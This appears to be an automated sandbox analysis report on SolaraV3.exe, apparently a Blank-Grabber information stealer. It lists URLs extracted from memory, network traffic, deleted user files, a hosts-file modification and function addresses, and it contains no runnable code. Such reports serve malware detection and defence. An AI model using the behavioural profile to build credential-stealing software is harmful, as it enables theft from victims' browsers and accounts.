Source: SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: SolaraV3.exe, 00000002.00000002.2039868154.000001FC25370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F55000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695276473.000001FC24F4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.26.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: SolaraV3.exe, 00000002.00000002.2043602926.000001FC25980000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: SolaraV3.exe, 00000002.00000003.1728427931.000001FC25337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1742788429.000001FC2530F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25358000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708000191.000001FC25358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC%
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B08000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SolaraV3.exe, 00000002.00000002.2042112590.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25337000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1706894370.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC25368000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1697571219.000001FC25368000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmp, SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.1.dr, libcrypto-1_1.dll.1.dr	String found in binary or memory: https://www.openssl.org/H
Source: SolaraV3.exe, 00000001.00000003.1560780982.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LSBIHQFDVT.pdf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\PALRGUCVEH.mp3	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZQIXMVQGAH.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NEBFQQYWPS.docx	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: conhost.exe	Process created: 40
Source: cmd.exe	Process created: 68

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE93A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

110_2_00007FF74EE93A70

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

110_2_00007FF74EEBB57C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC701000	1_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7089E0	1_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726964	1_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711D54	1_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71E570	1_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7135A0	1_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DEF0	1_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC729728	1_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725E7C	1_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC719EA0	1_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709800	1_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711740	1_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711F60	1_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC718794	1_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7180E4	1_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7240AC	1_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711944	1_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712164	1_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7139A4	1_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A2DB	1_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71DA5C	1_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC725C00	1_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC712C10	1_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC723C10	1_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC726418	1_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7208C8	1_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC711B50	1_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC715D30	1_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70A47B	1_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70ACAD	1_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC701000	2_2_00007FF6DC701000
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726964	2_2_00007FF6DC726964
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A2DB	2_2_00007FF6DC70A2DB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711D54	2_2_00007FF6DC711D54
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71E570	2_2_00007FF6DC71E570
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7135A0	2_2_00007FF6DC7135A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DEF0	2_2_00007FF6DC71DEF0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC729728	2_2_00007FF6DC729728
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725E7C	2_2_00007FF6DC725E7C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC719EA0	2_2_00007FF6DC719EA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709800	2_2_00007FF6DC709800
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711740	2_2_00007FF6DC711740
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711F60	2_2_00007FF6DC711F60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC718794	2_2_00007FF6DC718794
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7180E4	2_2_00007FF6DC7180E4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7240AC	2_2_00007FF6DC7240AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7089E0	2_2_00007FF6DC7089E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711944	2_2_00007FF6DC711944
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712164	2_2_00007FF6DC712164
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7139A4	2_2_00007FF6DC7139A4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71DA5C	2_2_00007FF6DC71DA5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC725C00	2_2_00007FF6DC725C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC712C10	2_2_00007FF6DC712C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC723C10	2_2_00007FF6DC723C10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC726418	2_2_00007FF6DC726418
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7208C8	2_2_00007FF6DC7208C8
